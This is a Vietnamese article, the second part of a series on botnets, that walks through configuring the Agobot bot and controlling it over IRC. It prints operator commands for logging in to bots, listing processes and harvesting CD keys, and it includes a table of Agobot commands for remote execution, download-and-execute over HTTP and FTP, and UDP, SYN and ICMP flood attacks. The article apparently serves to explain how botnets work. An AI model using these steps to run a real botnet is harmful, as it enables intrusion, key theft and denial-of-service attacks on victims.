MẠNG BOTNET (P2) – Thiết lập một mạng botnet

182

Giai đoạn cấu hình là cung cấp server IRC và kênh thông tin. Sau khi cài đặt lên một máy tính đã được kiểm soát, bot sẽ kết nối tới host được chọn. Đầu tiên kẻ tấn công nhập dữ liệu cần thiết vào để giới hạn quyền truy cập bot, bảo vệ an toàn cho kênh và cuối cùng cung cấp một danh sách người dùng được cấp phép (những người có thể điều khiển bot). Ở giai đoạn này, bot có thể được điều chỉnh sâu hơn, như định nghĩa phương thức tấn công và đích đến.
Bước đầu tiên là cấu hình bot thông qua giao diện đồ hoạ đơn giản của nó (Xem hình 3). Thông tin được nhập vào bao gồm tên, số cổng IRC server, tên kênh, danh sách người sử dụng với mật khẩu master (chủ điều khiển), cuối cùng là tên file và thư mục cài đặt bot. Một số thành phần bổ sung cũng được kích hoạt như hỗ trợ sniffing và cơ chế trạng thái. Kết quả của giai đoạn này là file config.h, file nền tảng trong quá trình biên dịch bot được tạo.

botnet4

Hình 3: Giao diện cấu hình Agobot.

Điều khiển theo lệnh (Command and Control) Sau khi bot được biên dịch, hai hệ thống còn lại sẽ tấn công theo kiểu “thủ công”. Máy chủ (master) kết nối tới IRC server và liên kết với kênh dẫn để có thể ra lệnh điều khiển cho bot (xem hình 4).

botnet5

Hình 4: Máy chủ và kết nối kênh

Muốn thu được quyền điều khiển qua các bot, một cơ chế thẩm định là cần thiết. Cơ chế này được tạo đơn giản bằng cách gửi một lệnh tới kênh (xem hình 5).

.login FaDe dune

botnet6

Hình 5: Thẩm định username và password

Sau đó, bot đầu tiên được yêu cầu đưa ra danh sách tất cả chương trình đang chạy trên máy tính bị chiếm quyền kiểm soát (xem hình 6):

/msg FakeBot–wszyzc .pctrl.list

botnet8

Hình 6: Máy chủ đưa ra yêu cầu cho bot đầu tiên

Sau đó, bot thứ hai được yêu cầu đưa ra thông tin và khoá cdkey của các chương trình ứng dụng cài đặt trên máy (hình 7):

/msg FakeBot2–emcdnj .bot.sysinfo

/msg FakeBot2–emcdnj .harvest.cdkeys

botnet9

Hình 7: Máy chủ đưa ra yêu cầu cho bot thứ hai

Ở ví dụ này chúng ta sử dụng những tính năng hết sức đơn giản. Còn thực tế, Agobot cung cấp một tập hợp rất phong phú các lệnh và chức năng. Một trong số chúng bạn có thể xem ở Bảng 2:

Các lệch Agobot hỗ trợ:

Lệnh Mô tả
command.list Danh sách tất cả các lệnh có thể sử dụng
bot.dns Xử lý một địa chỉ IP hoặc hostname
bot.execute Chạy một file .exe trên máy từ xa
bot.open Mở một file trên máy từ xa
bot.command  Chạy một lệnh với system()
irc.server Kết nối tới một IRC server
irc.join Nhập thông tin của một kênh dẫn cụ thể
irc.privmsg Gửi thư riêng cho một người dùng
http.execute Download và thực thi file qua HTTP
ftp.execute Download và thực thi file qua FTP
ddos.udpflood Khởi động một chương trình UDP tràn
ddos.synflood  Khởi động một Syn tràn
ddos.phaticmp Khởi động một PHATicmp tràn
redirect.http Khởi động một HTTP proxy
redirect.socks  Khởi động một SOCKS4 proxy
pctrl.list Đưa ra danh sách chương trình
pctrl.kill  Loại bỏ các chương trình

Một số lệnh Agobot